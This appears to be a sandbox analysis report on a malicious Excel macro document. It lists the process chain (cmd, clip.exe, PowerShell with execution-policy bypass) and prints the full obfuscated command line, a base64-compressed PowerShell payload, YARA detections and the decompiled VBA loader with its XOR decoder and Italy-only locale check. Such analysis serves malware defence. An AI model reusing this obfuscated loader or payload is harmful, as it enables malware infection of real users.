JaD=qasUyJ1dKYY+V0F&&set fV=.text.ENcOdING]::''AS`C&&set Pb={1}\''&&set LHM=v&&set pw8t=GaxGO/xX1CYmTXt&&set 7y=I7&&set XT=s&&set yV=uo&&set QD=i6SO&&set iWT=]::''F`R`o`MBAse`64Stri&&set qrQ=zfPUPs5JaAFW&&set Dy=0/e&&set 4NX=','jHSOn&&set g3fn=`oE`Nd''( )}&&set RT=xE','C'&&set jB={0}{47}{33}{30}{1}{34}{50}{4}{46}{31&&set 2su=PlkIRSG','fSl+lb0CYnloyxTlthMl6&&set rC=}{29}{9}{&&set 8Y=4&&set 5v=hCdAfH4pl9',&&set xd= )[1,3] &&set 4Y=AefjFQblNcpE4lg&&set 8lU=','ejG/pwf4EiFPQC3Y&&set Oo=yo2dMx&&set WxJY=+ 'x'-JoiN'' )( ( [S&&set Mcz=L&&set Wyh=QbYcFAGfmhTt/WAKoZjvt5XsB/HY&&set 6p=Xa/O6smRbnn','32O&&set 3O7I=LkcB'&&set JtM=LdXzlH5AiqodnkybHbbbrH&&set LK='0Lv6L&&set pD=10}'' -f '&&set gqy= -f 'eX','t','eTt' )).\&&set 6LrC=Ystem.w&&set xQV='g',( \''{2}{0}{1}\''&&set 9CU='xL1w032cbz&&set Y27=LRcf487TKv0QauRlD9be1uKl&&set DAk=}{48&&set k1W=T&&set GZJ1=inD&&set oh= IO.`&&set XB=a6P&&set kG=6f&&set fUI=bMjUo673DHHJu8i','&&set m2=24}{2}{42}{19}{45}{&&set K7=).\''inVO`kE\''(' ' &&set OrFY=GNTS1+BpbbHL1tF3iYVG&&set PH=cMdBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh&&set wZHB=J&&set MVT3=Brmg4ISxL&&set 21=}{35}&&set 8Ne=+sR8Ei7goBM&&set gi1h=^^^^^^^\| ^^^^^^^^^^^^^^^&(''{0}{1}''-f 'f','ORea&&set I3ae=','dHKk2y&&set f8N1=s/pjm5QG+Uw','As&&set RfN=oV','o','oEET',&&set dnk={&&set okc=hdO0fMc1&&set f2=A&&set kNPC=Lyj0hSicUL1suvPnX&&set AqH=4/&&set 8B=\''{2}{&&set At=','e','W-&&set szN=ZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJ&&set Vn=.Clipbo&&set S9=ard]::(&&set 2h=IYQSiCG&&set iL=L . (&&set D9nJ=''i`N`V&&set DA= &&set 8zYQ=c&&set oc=H1&&set aEs=hoNLSo&&set gH81=,'&&set ivp=ftK8UuZ5LdqmBaILN&&set ak=IC&&set wAIB=fPnVU0HoT+&&set MNA=E','tN&&set m4={2}{0}{&&set Rd3=wJ'&&set WYi=aFd&&set Fjwh=N.C&&set oD=`AteSTrE`AM( [SYSt&&set SVbw=ALYNhELyiaA1M1&&set aJ=34]+'x')( .(''{1}{0}{&&set Ms1U=by&&set so1T=Pre&&set XVj=w==','1K&&set xlCT=s2DS//e&&set LU0G=B&&set oWS=HNugXUPjnVoGb3bE7e','XWc4t&&set gSCj=D&&set Yzur= &&set opQ=),[sYsTe&&set OdW=oWS.CLiPboaRd]::(&&set Kxc6=Pc+BeNlKIqoxmnaJ&&set ay=NvjPN2m&&set WF=qhsxvF6ggHSAvv&&set 4KVu=( ${pS`h`OmE}[4]&&set 8v1=oKp&&set QMEZ={38}{41}{15}{13}{27&&set v1=0}{1}\'' -f 'e&&set qid=jqwa6Bj','oZEH81Es7&&set 4E0y= [syStEM&&set lwe=40+HZpXFA&&set 7ut= \''{2}{0}{1}\'' &&set F24u=K&&set GWCJ=ver&&set Mh=9HhxiqChyuK&&set ly=A&&set Rn='neW-','jECT') IO.CO&&set Wy=qiY2Jya4B5oLmH&&set lQ=2}&&set Lz=,'bE&&set Sye4=B&&set xzU='GDL&&set jkew=zEJFZG','&&set 7FGL=,'Iz&&set lskm=EcHO/^^^^^^^^^^^^^^^&&&set wyNR=NS1blIorpYOOdplN65rKj&&set Rpm=fA3bUz/Phr&&set Qe=em.io.MEMorYSTREam][sYSte&&set PN=ES&&set 7GBY=BOZV5&&set x58A=efrqnAUABd+h0nPdJvf7SH&&set pN0=xnma7xH&&set xvz=\'' &&set ivU={&&set WIUk= ^^^\|cLiP^^^&^^^&cMd /C poweRS&&set K90z=B&&set x0=z+mg7N&&set 2PKZ=n&&set 8o=Xv2h6+XDuwrB2UzD&&set xI=)&&set vl1D=kFtFBYL7hXXHaH&&set JxP5=2NIa13B2VYlABNEyPGpc&&set LG=DdlpSoWp+ZSu2&&set QI=3}{23}{17&&set 4KG1=3JlvvCkqSn&&set w8PF=L/&&set AR= -f 'T','ext' ),'S'&&set Qm=/2+p/&&set fvVc=et&&set qe6u=''-f 'oB',&&set JH3p=CMioW+&&set rxku=X&&set gED=5eVNRxBB&&set aS=P`REf&&set SA=E`ADER( ${&&set xnM= ( &&set g274=f8Zz+ZY201PTp&&set OyI=m.iO.COm&&set lVa=pO&&set LoKD= \''{0}{1}\'' -f&&set SzR4=}{16}{36}&&set OWD=TLR',&&set Dgc=qmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+&&set s06=s0uJ8LMG&&set G6=`ereNce}.( \''&&set g1=5kPuHoeb2d4V2DswOgiwNQPKP','pxXg&&set VO=}{12}{&&set MI4=oKe&&set 2w=e4UYmTa','iE5d4E&&set X2=11','PFd/&&set i3qb=nmSUbRKm/4PD&&set Ga0p=c','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn'&&set ogN=/&&set GtO={32}{2&&set ot=m.COn&&set VUnC=dVZtc6JIEP4rXVu5CIsSQKNBKx/&&set Di7W=,'5T8EDISyqRylxGVJpP64&&set Kpm=)&&set iX=tuu&&set AX0i=,'sjp6c&&set 6Ay=1}\''-f 'o','re','ionC&&set P7=Ch'&&set vTb=eH0'&&set MEn9=0}{8}{&&set wJzc=_},&&set gV=+VJA&&set gKQ=GFy3gJKWW&&set yD=H&&set FC0k=+${PS&&set Llu=39}{&&set jyOe=BYPaSS -NOnI &&set 7g=Q&&set RqJz=eLl&&set lW8=2}'' -f 'Fo&&set kIO=t2pO',&&set rcp={1}{2}{0}&&set YB=Ws+KLOl&&set A0yL=,&&set MPf=K1dUB4BJsmJlTTDKH9Nv&&set Oswb=UG&&set xDr=,&&set Rn1P=1J7&&set gSPy='SISLxsB+i0VNzgIu9Pt7eBk&&set WJ=QG8twkm+pRZlcthuqcLf&&set 62=E`sSION`.`deFL&&set Wp=){${_}.''&&set qjC=IRS&&set rSoi=m&&set 3Wz=D26&&set qkN=U&&set 85wf=DiHo0&&set 2U=sTrEA`MR&&set O8N='K5AY3vQIdfy+&&set ax=5Zml5EM9PfzlFGjG&&set rMQ=tw','oyn','9F','IKgTW','CVhh6q5k76fS&&set lG2=sZyTl&&call set QJi=%lskm%%4KVu%%FC0k%%MZ%%aJ%%lQ%%qe6u%%Rn%%fXO9%%62%%oD%%Qe%%ot%%GWCJ%%k1W%%iWT%%quG%%jB%%XeL%%FI%%GtO%%ld%%QMEZ%%DAk%%SzR4%%ivU%%Llu%%dAs%%MEn9%%QI%%21%%dnk%%2JBb%%mOv%%VO%%m2%%rdfX%%rC%%pD%%kIO%%9CU%%PF%%Ga0p%%Lz%%dn%%gSPy%%8Ne%%M76%%5v%%kmP%%O8N%%Rpm%%Kxc6%%ibgE%%F24u%%Ms1U%%97tN%%y41%%md%%LU0G%%Rd3%%AX0i%%X2%%w8PF%%qkN%%xZ%%iX%%OWD%%LK%%XVj%%Dgc%%x58A%%JtM%%Wyh%%qrQ%%WMP%%Di7W%%OJo%%5c%%rSoi%%wyNR%%Mh%%2h%%3O7I%%gH81%%Oswb%%L4%%mti%%Y27%%sBW%%JNvz%%i3qb%%MTk%%79%%7g%%jkew%%JH3p%%I3ae%%sD%%RO%%JF%%Mcz%%Wy%%GrLY%%qjC%%8v1%%4Y%%KGUu%%kG%%yMaD%%8zYQ%%a3%%du4k%%JxP5%%ksNm%%6In%%x0%%YB%%ly%%XT%%ay%%Sye4%%jvc%%fWO4%%pw8t%%XB%%ak%%gV%%kNPC%%f8N1%%gSCj%%dq%%oc%%qXy%%gKQ%%8Y%%6x%%OrFY%%g1%%fUI%%VUnC%%Jx19%%ivp%%85wf%%s06%%Vkgt%%gED%%ax%%M93h%%Qm%%okc%%AG%%W39h%%2w%%4KG1%%fvVc%%87kx%%wZHB%%rxku%%LG%%WJ%%7GBY%%MPf%%lVa%%PH%%4NX%%oWS%%8o%%VZA%%Yu%%gS%%k2G%%Pj%%MNA%%sGDZ%%FD%%5m%%Rn1P%%J6%%RfN%%kEQz%%2su%%pIA%%g9R%%A0yL%%lM%%LHM%%7y%%pN0%%f2%%3kP%%Oo%%SVbw%%WF%%RT%%xDr%%xzU%%AqH%%wFhV%%xlCT%%MVT3%%6p%%mC%%WYi%%qid%%K90z%%QD%%RLj%%8lU%%wAIB%%rMQ%%QEdm%%vl1D%%7wv%%2PKZ%%JaD%%XjK%%vTb%%7FGL%%g274%%lwe%%szN%%aEs%%lG2%%fQN%%S1%%ogN%%3Wz%%yV%%Dy%%qK%%opQ%%OyI%%so1T%%34f%%Fjwh%%7T%%PN%%96f%%lW8%%AXSR%%At%%vJIZ%%oh%%2U%%SA%%wJzc%%4E0y%%fV%%xCZA%%gi1h%%P7%%Wp%%p5%%g3fn%%Kpm%%WIUk%%yD%%RqJz%%Yzur%%qpO%%fH%%po%%jyOe%%q3FQ%%iL%%7ut%%Igd%%Op%%3mr%%wpf%%m4%%6Ay%%aLve%%DA%%xI%%i9PL%%xnM%%vrWE%%6jA%%aS%%G6%%rcp%%xvz%%i8%%xd%%WxJY%%6LrC%%GZJ1%%OdW%%LoKD%%xQV%%gqy%%D9nJ%%MI4%%54K%%M3hU%%Vn%%S9%%8B%%v1%%J3%%Pb%%AR%%K7%%KcOP%&&Cmd /C %QJi:''=!7w:~1!%'
Imagebase:	0x4a290000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2816 Parent PID: 2808

General

Start time:	21:40:29
Start date:	13/12/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	Cmd /C %QJi:''='%
Imagebase:	0x4a290000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3064 Parent PID: 2816

General

Start time:	21:40:30
Start date:	13/12/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG','CMioW+','dHKk2y6hkJYLYlNaoLqiY2Jya4B5oLmHzZ','IRSoKpAefjFQblNcpE4lgpZragUZRw9kIMJM','nf6yvfeRHwys6fo5cRd3b1jNexb2NIa13B2VYlABNEyPGpcSMUVYAdIBG','z+mg7NWs+KLOlAsNvjPN2mBi6Wr0yJa+CgVQ64wlYgUszOdQrtlwhW0wsc7/TRio00qZdd5GaxGO/xX1CYmTXta6PIC+VJALyj0hSicUL1suvPnXs/pjm5QG+Uw','AsDIUjPSUH1VBGFy3gJKWW4FFQB2enJqIYcGNTS1+BpbbHL1tF3iYVG5kPuHoeb2d4V2DswOgiwNQPKP','pxXgbMjUo673DHHJu8i','dVZtc6JIEP4rXVu5CIsSQKNBKx/UsJo7','4d7ftK8UuZ5LdqmBaILNDiHo0s0uJ8LMGki6','U+ZEre4WJW5eVNRxBB5Zml5EM9PfzlFGjGgb/2+p/hdO0fMc1js5R6Eb08Ls3','bxS11Hye4UYmTa','iE5d4E3JlvvCkqSnetoJOLevLKGJXDdlpSoWp+ZSu2QG8twkm+pRZlcthuqcLfBOZV5K1dUB4BJsmJlTTDKH9NvpOcMdBAWkCsFa','LKyC','e0p+w0Bofaf/Lyle2u7B3WVDcyxF4zTu6pwrh','jHSOnHNugXUPjnVoGb3bE7e','XWc4tXv2h6+XDuwrB2UzDVy7l4JxfxW4i57aYZL89PzDtIFcgjp5ME','tNFOv1CerMt7ONo0c','q','oSUE5C3FlV61J7WoV','o','oEET','PlkIRSG','fSl+lb0CYnloyxTlthMl62Edc7LZcTppDDTwyngbQW6fTbNBM9T6eN3+Vxy','Uauer5J/QUvI7xnma7xHAUNemw2mOyo2dMxALYNhELyiaA1M1qhsxvF6ggHSAvvxE','C','GDL4/keacVs2DS//eBrmg4ISxLXa/O6smRbnn','32Oy3ANhmaFdjqwa6Bj','oZEH81Es7Bi6SObR','ejG/pwf4EiFPQC3YfPnVU0HoT+tw','oyn','9F','IKgTW','CVhh6q5k76fSD4XjkFtFBYL7hXXHaHunqasUyJ1dKYY+V0F7ooYCqFO5CUzUMaaw92FK','WFeH0','Izf8Zz+ZY201PTp40+HZpXFAZEGBZ8L/Vs','Nuj8jM2MH','BlogkZxleJhoNLSosZyTloM2d1KdrFAH/D26uo0/eRo5A5SnpE3C/') ),[sYsTem.iO.COmPreSSiON.CoMPResSIoNmODe]::'D`EcO`Mpr`ESS' )^\|.('{0}{1}{2}' -f 'Fo','R','eaCH') {.('{0}{1}{2}'-f 'n','e','W-oBjECT') IO.`sTrEA`MRE`ADER( ${_}, [syStEM.text.ENcOdING]::'AS`CIi') } ^\| ^&('{0}{1}'-f 'f','OReaCh'){${_}.'r`eadt`oE`Nd'( )}) '
Imagebase:	0x4a290000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: clip.exe PID: 3012 Parent PID: 2816

General

Start time:	21:40:30
Start date:	13/12/2018
Path:	C:\Windows\System32\clip.exe
Wow64 process (32bit):	false
Commandline:	cLiP
Imagebase:	0x4e0000
File size:	26112 bytes
MD5 hash:	04EBDDCC3A90B6512AEF4AA2EEE36624
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.1249360856.012C0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.1249342410.006B0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.1248635443.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000003.1249027719.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.1248720839.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.1248969895.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000000.1248315695.00010000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000006.00000002.1249262618.00340000.00000004.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3028 Parent PID: 2816

General

Start time:	21:40:30
Start date:	13/12/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Imagebase:	0x4a290000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 808 Parent PID: 3028

General

Start time:	21:40:30
Start date:	13/12/2018
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Imagebase:	0x228e0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1264839354.01CC0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1263643081.01290000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1263634948.01287000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1263500876.00400000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1263628810.01280000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000008.00000002.1264845731.01CC7000.00000004.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Workbook_Open, APIs: 3, Strings: 0, Number of lines: 7, Relevance: 10.507

APIs	Meta Information
International	Microsoft Excel:Application.International(2) -> 39
xlCountrySetting
Quit

Line	Instruction	Meta Information
11	Sub Workbook_Open()
12	If Application.International(xlCountrySetting) = 39 Then	Microsoft Excel:Application.International(2) -> 39 xlCountrySetting executed
12	Sheet3A
12	Else
12	Application.Quit	Quit
12	Endif
13	End Sub

Function Apost, APIs: 16, Strings: 7, Number of lines: 7, Relevance: 56.007

APIs	Meta Information
Part of subcall function MicrosoftDoc@ThisWorkbook: Split
Part of subcall function MicrosoftDoc@ThisWorkbook: LBound
Part of subcall function MicrosoftDoc@ThisWorkbook: UBound
Part of subcall function MicrosoftDoc@ThisWorkbook: StrConv
Part of subcall function MicrosoftDoc@ThisWorkbook: vbFromUnicode
Part of subcall function MicrosoftDoc@ThisWorkbook: LBound
Part of subcall function MicrosoftDoc@ThisWorkbook: LBound
Part of subcall function MicrosoftDoc@ThisWorkbook: UBound
Part of subcall function MicrosoftDoc@ThisWorkbook: Val
Part of subcall function MicrosoftDoc@ThisWorkbook: UBound
Part of subcall function MicrosoftDoc@ThisWorkbook: LBound
Part of subcall function MicrosoftDoc@ThisWorkbook: StrConv
Part of subcall function MicrosoftDoc@ThisWorkbook: vbUnicode
Replace	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se Replace("Cm__D++ /V++:ON++/__C "se","_","") -> CmD++ /V++:ON++/C "se Replace("CmD++ /V++:ON++/C "se","+","") -> CmD /V:ON/C "se
Replace	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se Replace("Cm__D++ /V++:ON++/__C "se","_","") -> CmD++ /V++:ON++/C "se Replace("CmD++ /V++:ON++/C "se","+","") -> CmD /V:ON/C "se
Replace	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se Replace("Cm__D++ /V++:ON++/__C "se","_","") -> CmD++ /V++:ON++/C "se Replace("CmD++ /V++:ON++/C "se","+","") -> CmD /V:ON/C "se

Strings	Decrypted Strings
"1"
""""
"-"
""""
"_"
""""
"+"

Line	Instruction	Meta Information
27	Function Apost(S as String) as String
28	filks = MicrosoftDoc(S, "1")	executed
28	dems = Replace(filks, "-", "")	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se executed
28	deks = Replace(dems, "_", "")	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se executed
28	defs = Replace(deks, "+", "")	Replace("C---m__D++ /V++:O---N++/--__C "se","-","") -> Cm__D++ /V++:ON++/__C "se executed
29	Apost = defs
30	End Function

Function MicrosoftDoc, APIs: 13, Strings: 1, Number of lines: 15, Relevance: 21.015

APIs	Meta Information
Split
LBound
UBound
StrConv
vbFromUnicode
LBound
LBound
UBound
Val
UBound
LBound
StrConv
vbUnicode

Strings	Decrypted Strings
","

Line	Instruction	Meta Information
43	Function MicrosoftDoc(ByVal sData as String, ByVal sKey as String) as String
44	Dim i as Long, l as Long, byOut() as Byte, sIn() as String, byKey() as Byte	executed
45	sIn = Split(sData, ",")	Split
46	Redim byOut(LBound(sIn) To UBound(sIn))	LBound UBound
47	byKey = StrConv(sKey, vbFromUnicode)	StrConv vbFromUnicode
48	l = LBound(byKey)	LBound
49	For i = LBound(sIn) To UBound(sIn) Step 1	LBound UBound
50	byOut(i) = Val(sIn(i)) Xor byKey(l)	Val
51	l = l + 1
52	If l > UBound(byKey) Then	UBound
52	l = LBound(byKey)	LBound
52	Endif
53	Next i	LBound UBound
54	MicrosoftDoc = StrConv(byOut, vbUnicode)	StrConv vbUnicode
55	End Function

Function TerSS, APIs: 4, Strings: 4, Number of lines: 7, Relevance: 19.257

APIs	Meta Information
Part of subcall function Apost@ThisWorkbook: Replace
Part of subcall function Apost@ThisWorkbook: Replace
Part of subcall function Apost@ThisWorkbook: Replace
Replace	Replace("t 7T=oMP$Re$sSIo$Nm$OD$e]:$:""D$`E$cO`$Mpr`&&s$et fXO9=`m`pR&&s$et lM='Uauer5J/QU&&se$t OJo=3rTzG&&set J3=t',(\""{0}&&s$et$ du4k=jNe$xb&&se$t$ xCZA=Ii"") } ^$^$^^$^^$^$^","$","") -> t 7T=oMPResSIoNmODe]::""D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\""{0}&&set du4k=jNexb&&set xCZA=Ii"") } ^^^^^^^^

Strings	Decrypted Strings
"CH') {.(""""{0}{1}{2}""""-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Win""dows&&set kmP='k',&&"
"&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=""""&&set 54K=\""""( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\"""" -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Hom""e}[&&s"
"et 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr"
"114,28,28,28,92,110,110,117,26,26,17,30,103,26,26,11,126,28,28,28,127,26,26,30,28,28,110,110,114,17,19,66,84"

Line	Instruction	Meta Information
20	Function TerSS()
21	lol = "CH') {.(""""{0}{1}{2}""""-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Win" + "dows&&set kmP='k',&&"	executed
22	miss = "&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=""""&&set 54K=\""""( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\"""" -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Hom" + "e}[&&s"
23	rava = "et 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr"
24	sos = miss + rava + tegad + lol
25	TerSS = Apost("114,28,28,28,92,110,110,117,26,26,17,30,103,26,26,11,126,28,28,28,127,26,26,30,28,28,110,110,114,17,19,66,84") & Replace("t 7T=oM" + "P" + "$Re$sSIo$Nm$" + "OD$e]:$:""""D$`E$cO`$M" + "pr`&&s$et fXO9=`m`pR&&s$et lM='Uauer5J/QU&&se$t OJo=3rTzG&&set J3=t',(\""""{0}&&s$et$ du4k=jNe$xb&&se$t$ xCZA=Ii"""") } ^$^$^^$^^$^$^", "$", "") + sos	Replace("t 7T=oMP$Re$sSIo$Nm$OD$e]:$:""D$`E$cO`$Mpr`&&s$et fXO9=`m`pR&&s$et lM='Uauer5J/QU&&se$t OJo=3rTzG&&set J3=t',(\""{0}&&s$et$ du4k=jNe$xb&&se$t$ xCZA=Ii"") } ^$^$^^$^^$^$^","$","") -> t 7T=oMPResSIoNmODe]::""D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\""{0}&&set du4k=jNexb&&set xCZA=Ii"") } ^^^^^^^^ executed
26	End Function

Function MasterFunction, APIs: 1, Strings: 8, Number of lines: 11, Relevance: 13.511

APIs	Meta Information
Part of subcall function TerSS@ThisWorkbook: Replace

Strings	Decrypted Strings
